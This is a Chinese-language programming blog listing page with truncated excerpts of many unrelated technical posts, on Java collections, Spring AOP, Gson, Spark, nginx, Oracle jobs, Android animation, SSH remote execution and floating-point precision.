             List ,set ,map的使用方法和区别 java容器类类库的用途是保存对象,并将其分为两个概念:     Collection集合:一个独立的序列,这些序列都服从一条或多条规则;List必须按顺序保存元素  ,set不能重复元素;Queue按照排队规则来确定对象产生的顺序(通常与他们被插入的
  • 杀LINUX的JOB进程 bijian1013 linuxunix
    今天发现数据库一个JOB一直在执行,都执行了好几个小时还在执行,所以想办法给删除掉   系统环境:    ORACLE 10G    Linux操作系统   操作步骤如下: 第一步.查询出来那个job在运行,找个对应的SID字段 select * from dba_jobs_running--找到job对应的sid &n
  • Spring AOP详解 bijian1013 javaspringAOP
            最近项目中遇到了以下几点需求,仔细思考之后,觉得采用AOP来解决。一方面是为了以更加灵活的方式来解决问题,另一方面是借此机会深入学习Spring AOP相关的内容。例如,以下需求不用AOP肯定也能解决,至于是否牵强附会,仁者见仁智者见智。 1.对部分函数的调用进行日志记录,用于观察特定问题在运行过程中的函数调用
  • [Gson六]Gson类型适配器(TypeAdapter) bit1129 Adapter
    TypeAdapter的使用动机  Gson在序列化和反序列化时,默认情况下,是按照POJO类的字段属性名和JSON串键进行一一映射匹配,然后把JSON串的键对应的值转换成POJO相同字段对应的值,反之亦然,在这个过程中有一个JSON串Key对应的Value和对象之间如何转换(序列化/反序列化)的问题。   以Date为例,在序列化和反序列化时,Gson默认使用java.
  • 【spark八十七】给定Driver Program, 如何判断哪些代码在Driver运行,哪些代码在Worker上执行 bit1129 driver
    Driver Program是用户编写的提交给Spark集群执行的application,它包含两部分 作为驱动: Driver与Master、Worker协作完成application进程的启动、DAG划分、计算任务封装、计算任务分发到各个计算节点(Worker)、计算资源的分配等。 计算逻辑本身,当计算任务在Worker执行时,执行计算逻辑完成application的计算任务
  • nginx 经验总结 ronin47 nginx 总结
       深感nginx的强大,只学了皮毛,把学下的记录。    获取Header 信息,一般是以$http_XX(XX是小写)            获取body,通过接口,再展开,根据K取V    获取uri,以$arg_XX      &n
  • 轩辕互动-1.求三个整数中第二大的数2.整型数组的平衡点 bylijinnan 数组
    import java.util.ArrayList; import java.util.Arrays; import java.util.List; public class ExoWeb { public static void main(String[] args) { ExoWeb ew=new ExoWeb(); System.out.pri
  • Netty源码学习-Java-NIO-Reactor bylijinnan java多线程netty
    Netty里面采用了NIO-based Reactor Pattern 了解这个模式对学习Netty非常有帮助 参考以下两篇文章: http://jeewanthad.blogspot.com/2013/02/reactor-pattern-explained-part-1.html http://gee.cs.oswego.edu/dl/cpjslides/nio.pdf
  • AOP通俗理解 cngolon springAOP
    1.我所知道的aop     初看aop,上来就是一大堆术语,而且还有个拉风的名字,面向切面编程,都说是OOP的一种有益补充等等。一下子让你不知所措,心想着:怪不得很多人都和 我说aop多难多难。当我看进去以后,我才发现:它就是一些java基础上的朴实无华的应用,包括ioc,包括许许多多这样的名词,都是万变不离其宗而 已。 2.为什么用aop&nb
  • cursor variable 实例 ctrain variable
    create or replace procedure proc_test01 as type emp_row is record( empno emp.empno%type, ename emp.ename%type, job emp.job%type, mgr emp.mgr%type, hiberdate emp.hiredate%type, sal emp.sal%t
  • shell报bash: service: command not found解决方法 daizj linuxshellservicejps
    今天在执行一个脚本时,本来是想在脚本中启动hdfs和hive等程序,可以在执行到service hive-server start等启动服务的命令时会报错,最终解决方法记录一下:   脚本报错如下: ./olap_quick_intall.sh: line 57: service: command not found ./olap_quick_intall.sh: line 59
  • 40个迹象表明你还是PHP菜鸟 dcj3sjt126com 设计模式PHP正则表达式oop
    你是PHP菜鸟,如果你:1. 不会利用如phpDoc 这样的工具来恰当地注释你的代码2. 对优秀的集成开发环境如Zend Studio 或Eclipse PDT 视而不见3. 从未用过任何形式的版本控制系统,如Subclipse4. 不采用某种编码与命名标准 ,以及通用约定,不能在项目开发周期里贯彻落实5. 不使用统一开发方式6. 不转换(或)也不验证某些输入或SQL查询串(译注:参考PHP相关函
  • Android逐帧动画的实现 dcj3sjt126com android
    一、代码实现: private ImageView iv; private AnimationDrawable ad; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout
  • java远程调用linux的命令或者脚本 eksliang linuxganymed-ssh2
    转载请出自出处: http://eksliang.iteye.com/blog/2105862        Java通过SSH2协议执行远程Shell脚本(ganymed-ssh2-build210.jar)   使用步骤如下: 1.导包 官网下载: http://www.ganymed.ethz.ch/ssh2/ ma
  • adb端口被占用问题 gqdy365 adb
    最近重新安装的电脑,配置了新环境,老是出现: adb server is out of date. killing... ADB server didn't ACK * failed to start daemon * 百度了一下,说是端口被占用,我开个eclipse,然后打开cmd,就提示这个,很烦人。 一个比较彻底的解决办法就是修改
  • ASP.NET使用FileUpload上传文件 hvt .netC#hovertreeasp.netwebform
    前台代码: <asp:FileUpload ID="fuKeleyi" runat="server" /> <asp:Button ID="BtnUp" runat="server" onclick="BtnUp_Click" Text="上 传" />
  • 代码之谜(四)- 浮点数(从惊讶到思考) justjavac 浮点数精度代码之谜IEEE
    在『代码之谜』系列的前几篇文章中,很多次出现了浮点数。 浮点数在很多编程语言中被称为简单数据类型,其实,浮点数比起那些复杂数据类型(比如字符串)来说, 一点都不简单。 单单是说明 IEEE浮点数 就可以写一本书了,我将用几篇博文来简单的说说我所理解的浮点数,算是抛砖引玉吧。 一次面试 记得多年前我招聘 Java 程序员时的一次关于浮点数、二分法、编码的面试, 多年以后,他已经称为了一名很出色的
  • 数据结构随记_1 lx.asymmetric 数据结构笔记
    第一章   1.数据结构包括数据的 逻辑结构、数据的物理/存储结构和数据的逻辑关系这三个方面的内容。 2.数据的存储结构可用四种基本的存储方法表示,它们分别是 顺序存储、链式存储 、索引存储 和 散列存储。 3.数据运算最常用的有五种,分别是  查找/检索、排序、插入、删除、修改。 4.算法主要有以下五个特性:  输入、输出、可行性、确定性和有穷性。 5.算法分析的
  • linux的会话和进程组 网络接口 linux
    会话: 一个或多个进程组。起于用户登录,终止于用户退出。此期间所有进程都属于这个会话期。会话首进程:调用setsid创建会话的进程1.规定组长进程不能调用setsid,因为调用setsid后,调用进程会成为新的进程组的组长进程.如何保证? 先调用fork,然后终止父进程,此时由于子进程的进程组ID为父进程的进程组ID,而子进程的ID是重新分配的,所以保证子进程不会是进程组长,从而子进程可以调用se
  • 二维数组 元素的连续求解 1140566087 二维数组ACM
    import java.util.HashMap; public class Title { public static void main(String[] args){ f(); } // 二位数组的应用 //12、二维数组中,哪一行或哪一列的连续存放的0的个数最多,是几个0。注意,是“连续”。 public static void f(){
  • 也谈什么时候Java比C++快 windshome javaC++
      刚打开iteye就看到这个标题“Java什么时候比C++快”,觉得很好笑。   你要比,就比同等水平的基础上的相比,笨蛋写得C代码和C++代码,去和高手写的Java代码比效率,有什么意义呢?   我是写密码算法的,深刻知道算法C和C++实现和Java实现之间的效率差,甚至也比对过C代码和汇编代码的效率差,计算机是个死的东西,再怎么优化,Java也就是和C
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他